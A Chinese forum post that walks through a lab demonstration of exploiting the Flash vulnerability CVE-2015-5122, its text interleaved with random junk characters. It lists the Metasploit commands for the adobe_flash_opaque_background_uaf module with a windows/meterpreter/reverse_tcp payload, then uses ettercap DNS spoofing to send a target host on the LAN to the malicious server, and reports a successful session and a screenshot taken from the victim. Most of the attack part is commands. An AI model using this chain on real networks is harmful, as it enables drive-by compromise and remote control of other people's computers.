找回密码
 立即注册
查看: 1810|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ G3 ~8 Z0 x+ x/ Y" t 二、cve2015-5122漏洞实例演示虚拟机 ( ], K6 c) C8 s: l8 M+ d" x5 }0 n' v

, g9 F* g/ Z1 o0 l T; [

{8 U* D, p* ~9 h) Z2 i3 w   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 0 w8 {! n, l# M; |; r5 [

0 I# A9 D7 a" t: K$ S

' x# H' t( e" V! L" b9 B& ]0 A search cve-2015-5122如图: / K- O( y8 S+ s- v& e, N2 y7 O5 y

, U/ W) `; Q& g$ w h

1 V! R! d# E" D* A   , W9 W+ i/ r' I

[0 c0 T% ^% ^& K

' ?' I7 R3 y2 {" m8 n 下面我们敲如下命令: ' _' n8 T5 y+ p+ M

% e* ^/ K( H) I3 v

: R0 k( O2 ]5 d9 \4 D; b; n3 H9 ` use exploit/multi/browser/adobe_flash_opaque_background_uaf ) V- {8 o7 P2 n8 r; v/ H% `- G( V

- L: |) f2 ~9 i) Z2 H, ?) U

4 Y- |6 J' n" @, q7 H! \' K7 y set PAYLOAD windows/meterpreter/reverse_tcp & n& X. i: X& O. G- l% E

7 n* E$ e4 T8 W5 v# Y7 E. t

, ^' ~+ f5 i* b1 {) ^- |2 T% V set LHOST 192.168.0.109 5 Z9 l7 J: l% B5 }- Z- b

0 E& F* M- M0 t- G' q

7 \# G1 _/ R7 w! `0 g, I8 G set URIPATH /                        /*根目录*/ / \2 `1 r v( z% Y

# C3 c x; o/ @

) I' e: n6 c" Q) n2 v set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 Y" S$ E- T: b5 x& f7 H& N# r& C4 d

5 v) I- @# [4 Y& n6 ]' r6 |6 f2 A6 r

+ {, X6 K4 Q+ O: P+ H set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 6 m3 }& m+ V* G

; z- @$ s C* [- T/ O6 N+ g

Y( y8 X7 A0 p 然后show options如图: + n, [2 k" h) q: B+ b

6 u- H. K/ p/ F ~: M

* Q2 T. c+ u1 N6 d/ W6 ^5 d   , o$ l' P. i& @+ R) i) ]

2 M- f( ~- b6 Z6 B

% Z. L" v& z, ~ 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
# v$ i, [) Q& V7 y7 Y. U
) u- S& O8 X, j6 u

, I* [; \, m0 v! m2 h! u

1 |; _! C# @ d! ], X 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 + {2 {. g4 V2 }" S. |% b

d4 h! p7 }/ p2 n0 Y/ K

# |+ O/ Q" f0 |/ A/ R. \7 C Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 1 A8 @& S: o3 J" {' z2 u7 E4 X

) u) ?' [% x: ]% W0 J8 I

; C% j& `8 c0 `; V9 ?% B4 u3 H   ! Z3 f. P: t+ x7 N; H6 S. d6 T6 |

& a, G- @2 Q: p. i s

' E1 U8 H# o- p1 V0 ~) g8 d 成功了,这时候我们断开ettercap,如图: ; M, M: D0 v. u2 d% i% K; _' l" W

8 ~% Y5 e3 M. q9 N- [% X _

/ R" g' `2 Z! R# z   + W0 G/ | f, w7 l- @

. W* O; u0 A4 @! E- |* F

0 v" D0 I. z0 Y$ Z, x Screenshot如图: N0 S* G+ W4 b* ^0 t+ A

8 N( L9 z7 V& V1 i4 T

1 y8 L- E1 {1 V2 v$ w- d* O   " D+ {: w0 X8 y5 T

" t- l" [. G! u/ @2 `

9 S0 n: N+ _ t0 r4 T. z5 r9 ~' @1 G8 L5 M . {7 T9 x' h; J+ D7 v, h3 }9 l

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表